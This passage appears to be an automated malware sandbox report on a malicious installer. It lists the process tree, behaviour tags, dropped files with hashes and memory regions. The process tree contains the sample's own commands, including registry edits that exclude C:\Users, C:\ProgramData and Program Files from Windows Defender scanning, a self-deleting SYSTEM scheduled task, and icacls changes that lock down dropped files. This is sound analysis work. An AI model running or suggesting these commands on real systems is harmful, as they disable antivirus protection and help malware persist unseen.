                                    icacls "C:\Program Files (x86)\QEamD0\QEamD0.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:5076
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\QEamD0.exe" /grant:r Users:(RX) /deny Users:(DE)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4100
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\QEamD0\QEamD0.exe" /grant:r Users:(RX) /deny Users:(DE)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1352
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\image.png" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:868
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\QEamD0\image.png" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:4932
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:2212
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\QEamD0\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:2356
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • System Location Discovery: System Language Discovery
                                  PID:1864
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:5032
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                      PID:4424
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3804
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:2372
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\QEamD0\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:4668
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\thumbs.db" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:2480
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\QEamD0\thumbs.db" /inheritance:r
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:4432
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:2380
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      4⤵
                                        PID:4368
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\QEamD0\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:5056
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:4448
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\QEamD0\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4392
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\XPSPLOG.dll" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:1664
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\QEamD0\XPSPLOG.dll" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:1684
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:4864
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\QEamD0\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:4264
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:1696
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\QEamD0\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:2688
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\s6oQza" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4672
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\s6oQza" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:2420
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe
                                  1⤵
                                    PID:2232
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:1416
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:2836
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:2972
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:4768
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:5000
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:1048
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:3732
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:4408
                                  • C:\Program Files (x86)\QEamD0\QEamD0.exe
                                    "C:\Program Files (x86)\QEamD0\QEamD0.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:3876
                                  • C:\Program Files (x86)\w58upmy\0DI6aunu.exe
                                    "C:\Program Files (x86)\w58upmy\0DI6aunu.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:688
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\QEamD0" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    PID:3148
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\QEamD0" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:1256
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    PID:4412
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      2⤵
                                        PID:3464
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4356
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:4808
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:2656

                                    Network

                                          MITRE ATT&CK Enterprise v16

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          e5894ca.rbs

                                          • Path C:\Config.Msi\e5894ca.rbs
                                          • Size 7KB
                                          • SHA256 671c4d08b52e6c104387ae7fc47fbfcf1597d6361d34f357136340c836c77650
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          QEamD0.exe

                                          • Path C:\Program Files (x86)\QEamD0\QEamD0.exe
                                          • Size 145KB
                                          • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\QEamD0\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 48ab9103211196583d1796026821c09f0cbfb8edacd6272a97acfd2c4f16d24e
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\QEamD0\image.png
                                          • Size 5.0MB
                                          • SHA256 e1011a1bb3baf2e25e63678ffd9e19e056870d7c75b799428b9e7f3a255865d1
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          thumbs.db

                                          • Path C:\Program Files (x86)\QEamD0\thumbs.db
                                          • Size 358KB
                                          • SHA256 d85398ebcb2d9576e03287566a0e530eb65f776ba928322e131b97b2867dd206
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\w58upmy\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 25b0d599d58e3e9e98773fac5d414cf2a7e5c66cb68f14a01e3c022a4ae025df
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\w58upmy\image.png
                                          • Size 5.0MB
                                          • SHA256 934e88d255520739e64f3790e2db0ce63f81b9cb635f4614be3bacb825940ef2
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          __PSScriptPolicyTest_2pwu1fx1.req.ps1

                                          • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2pwu1fx1.req.ps1
                                          • Size 60B
                                          • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                          • MD5 SHA1 SHA512 TLSH

                                          destopbak.ini

                                          • Path C:\Users\Public\Music\destopbak.ini
                                          • Size 2B
                                          • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                          • MD5 SHA1 SHA512

                                          UxEnhance64.dll

                                          • Path C:\Users\Public\s6oQza\UxEnhance64.dll
                                          • Size 3.1MB
                                          • SHA256 c44cdd9c1d2efe28f4188e40290981cdfad4f132b4eb51ee97f48ea594be0e40
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          adoresd.dat

                                          • Path C:\Users\Public\s6oQza\adoresd.dat
                                          • Size 4.7MB
                                          • SHA256 206c4bd4ca48eed8a7b2aef9e9aa6774d9eda25e62211f316e6347f00fbce23f
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          msadox.tb

                                          • Path C:\Users\Public\s6oQza\msadox.tb
                                          • Size 8KB
                                          • SHA256 6127ad967b9401163f0e1b0c3de05aa8ec28cabeceae90374c752afc80c056cc
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          oW9PTx.exe

                                          • Path C:\Users\Public\s6oQza\oW9PTx.exe
                                          • Size 135KB
                                          • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          MSI968F.tmp

                                          • Path C:\Windows\Installer\MSI968F.tmp
                                          • Size 7.0MB
                                          • SHA256 58ac4e2623e7520961a0523ccc84cdae28580485828c0ad83f77ae2968ec6456
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          e5894c9.msi

                                          • Path C:\Windows\Installer\e5894c9.msi
                                          • Size 7.1MB
                                          • SHA256 00f23b3e2865f41eccfbfd1ec2eeeea78edee626b523ca66f7b7edd7efd83338
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          metadata-2

                                          • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                          • Size 24.1MB
                                          • SHA256 962abd4be22bee98cfc4b70797ca5a79e2c8c59afc2a76e8f71368b2a179c719
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          {c32d0570-a883-4c10-9cd0-07c4994f838b}_OnDiskSnapshotProp

                                          • Path \??\Volume{6e0928ee-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{c32d0570-a883-4c10-9cd0-07c4994f838b}_OnDiskSnapshotProp
                                          • Size 6KB
                                          • SHA256 0da75e3953489f48bed130fb5741bd7ece43887a1306ddbf53d53d8cf340f6f8
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          xxxx.ini

                                          • Path \??\c:\xxxx.ini
                                          • Size 2B
                                          • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                          • MD5 SHA1 SHA512

                                          memory/224-220-0x0000000010000000-0x0000000010061000-memory.dmp

                                          memory/224-196-0x0000000000A30000-0x0000000000A44000-memory.dmp

                                          memory/224-208-0x0000000002EF0000-0x00000000036F7000-memory.dmp

                                          memory/224-189-0x0000000002EF0000-0x00000000036F7000-memory.dmp

                                          memory/224-184-0x00000000007A0000-0x00000000007A1000-memory.dmp

                                          memory/224-185-0x0000000002EF0000-0x00000000036F7000-memory.dmp

                                          memory/224-182-0x0000000002EF0000-0x00000000036F7000-memory.dmp

                                          memory/224-270-0x0000000002EF0000-0x00000000036F7000-memory.dmp

                                          memory/224-178-0x00000000753A0000-0x0000000075AEA000-memory.dmp

                                          memory/224-177-0x0000000000780000-0x0000000000781000-memory.dmp

                                          memory/224-243-0x0000000002EF0000-0x00000000036F7000-memory.dmp

                                          memory/688-255-0x0000000002D30000-0x0000000003537000-memory.dmp

                                          memory/688-236-0x0000000000680000-0x0000000000681000-memory.dmp

                                          memory/688-244-0x0000000002D30000-0x0000000003537000-memory.dmp

                                          memory/688-237-0x0000000073A80000-0x00000000741CA000-memory.dmp

                                          memory/688-259-0x0000000000680000-0x0000000000681000-memory.dmp

                                          memory/688-254-0x0000000003540000-0x0000000003541000-memory.dmp

                                          memory/2456-69-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-61-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-75-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-71-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-70-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-83-0x000002BC8C180000-0x000002BC8C20A000-memory.dmp

                                          memory/2456-68-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-63-0x00007FFB37A60000-0x00007FFB37A62000-memory.dmp

                                          memory/2456-64-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-84-0x000002BC8C180000-0x000002BC8C20A000-memory.dmp

                                          memory/2456-90-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-82-0x000002BC8C180000-0x000002BC8C20A000-memory.dmp

                                          memory/2456-81-0x000002BC8C180000-0x000002BC8C20A000-memory.dmp

                                          memory/2456-80-0x000002BC8C0A0000-0x000002BC8C0EE000-memory.dmp

                                          memory/2456-55-0x00007FFB37A50000-0x00007FFB37A52000-memory.dmp

                                          memory/2456-89-0x000002BC8B4C0000-0x000002BC8BD51000-memory.dmp

                                          memory/2456-56-0x00007FFB195A0000-0x00007FFB19ABE000-memory.dmp

                                          memory/3748-282-0x0000000006300000-0x0000000006654000-memory.dmp

                                          memory/3748-288-0x000000006F6A0000-0x000000006F6EC000-memory.dmp

                                          memory/3748-302-0x0000000007DD0000-0x0000000007DE1000-memory.dmp

                                          memory/3748-301-0x0000000007E50000-0x0000000007EE6000-memory.dmp

                                          memory/3748-300-0x0000000007C40000-0x0000000007C4A000-memory.dmp

                                          memory/3748-299-0x0000000007BD0000-0x0000000007BEA000-memory.dmp

                                          memory/3748-298-0x0000000008220000-0x000000000889A000-memory.dmp

                                          memory/3748-297-0x0000000007A90000-0x0000000007B33000-memory.dmp

                                          memory/3748-296-0x0000000006E60000-0x0000000006E7E000-memory.dmp

                                          memory/3748-272-0x00000000032B0000-0x00000000032E6000-memory.dmp

                                          memory/3748-273-0x0000000005CD0000-0x00000000062F8000-memory.dmp

                                          memory/3748-274-0x0000000005A10000-0x0000000005A32000-memory.dmp

                                          memory/3748-275-0x0000000005AB0000-0x0000000005B16000-memory.dmp

                                          memory/3748-276-0x0000000005C10000-0x0000000005C76000-memory.dmp

                                          memory/3748-287-0x0000000006EA0000-0x0000000006ED2000-memory.dmp

                                          memory/3748-286-0x00000000068F0000-0x000000000693C000-memory.dmp

                                          memory/3748-285-0x00000000068C0000-0x00000000068DE000-memory.dmp

                                          memory/3876-233-0x00000000753A0000-0x0000000075AEA000-memory.dmp

                                          memory/3876-247-0x00000000036F0000-0x0000000003EF7000-memory.dmp

                                          memory/3876-230-0x0000000001010000-0x0000000001011000-memory.dmp

                                          memory/3876-235-0x00000000036F0000-0x0000000003EF7000-memory.dmp

                                          memory/3876-250-0x0000000001010000-0x0000000001011000-memory.dmp

                                          memory/3876-246-0x0000000001030000-0x0000000001031000-memory.dmp

                                          memory/4772-12-0x00007FFB37A50000-0x00007FFB37A52000-memory.dmp

                                          memory/4772-13-0x00007FFB19480000-0x00007FFB19ABB000-memory.dmp

                                          memory/4772-16-0x00007FFB23C80000-0x00007FFB23C90000-memory.dmp

                                          memory/4772-38-0x00007FFB23C80000-0x00007FFB23C90000-memory.dmp